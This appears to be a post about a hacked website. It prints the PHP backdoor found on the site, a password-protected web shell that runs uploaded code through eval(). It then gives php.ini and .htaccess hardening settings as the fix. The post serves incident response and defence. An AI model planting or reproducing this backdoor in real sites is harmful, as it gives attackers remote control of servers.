<?php
error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t) {
echo "$t\n";
};
function testdata($t) {
say(md5("testdata_$t"));
};
echo "";";
testdata('start');
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3")
{
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
eval($code); }
else{ testdata('f');
};
}else{
testdata('pass');
};
testdata('end');
echo "
?>
Solution:
I also decided to go ahead and add the following settings to php.ini to prevent the hackers from getting any additional information:
allow_url_fopen = Off
register_globals = Off
display_errors = Off
expose_php = Off
log_errors = On
Also make sure that you add this to your .htaccess file so people can't see your php.ini settings:
order allow,deny
deny from all
Reference : http://forums.devshed.com/apache-development-15/htaccess-was-hacked-can-you-help-me-with-what-they-512348-2.html
